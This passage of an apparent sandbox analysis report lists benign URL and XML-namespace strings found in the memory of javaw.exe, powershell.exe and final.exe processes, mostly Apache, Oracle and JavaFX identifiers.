Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language;
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude;
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name$
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/input-buffer-size
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factoryDocu:
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner/w3c/d7
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor/5
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scannerm/l8
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager8
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver(
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-handler
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter:
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver:
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation-managersetBF
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factoryam7
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtde:
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/schema
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/localedJ
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocationetPubl?
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocationdK
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/security-manager
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/security-manager7
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declarationsion
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definitionr(
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/w3c/domD
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes
Source: javaw.exe, 0000000C.00000002.3911788928.00000000099DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: powershell.exe, 00000009.00000002.1820608682.00000254137BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://github.com
Source: powershell.exe, 00000009.00000002.2345146264.000002542A31C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ion=4.0.0.0
Source: final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: javaw.exe, 0000000C.00000002.3911788928.00000000099DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/jaxp/xpath/dom
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/(
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage4
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/schema/features/
Source: javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-stateml.FXML
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
Source: javaw.exe, 0000000C.00000002.3911788928.0000000009DFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javafx.com/fxml
Source: javaw.exe, 0000000C.00000002.3911788928.0000000009DFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javafx.com/fxml/1
Source: javaw.exe, 0000000C.00000002.3911788928.0000000009DFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javafx.com/javafx/8
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing8
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/$
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD?
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchemaD
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet0
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.dom.DOMResult/feature0
Source: javaw.exe, 0000000C.00000002.3911788928.000000000A244000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.dom.DOMSource/feature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.dom.DOMSource/feature0
Source: javaw.exe, 0000000C.00000002.3911788928.000000000A2E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.dom.DOMSource/featureK;)
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXResult/feature0
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXSource/feature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature/xmlfilter
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stax.StAXResult/feature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stax.StAXSource/feature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stream.StreamResult/feature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stream.StreamSource/feature
Source: powershell.exe, 00000009.00000002.2284762070.0000025422240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2284762070.0000025422383000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.1820608682.0000025412402000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.2580860064.0000020D95667000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1628873409.000002208E587000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820608682.00000254121D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.1820608682.0000025412402000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/feature/use-service-mechanismX
Source: javaw.exe, 0000000C.00000002.3911788928.000000000A244000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.html
Source: javaw.exe, 0000000C.00000002.3911788928.000000000A2E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.html#J)
Source: javaw.exe, 0000000C.00000003.2693175888.0000000018CD2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.2681083567.0000000018CCA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588459835.0000000018CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.htmlP
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/is-standalone
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/is-standalone.
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/;
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/XmlFeatureManager
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/enableExtensionFunctions
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit9
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepthx
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit
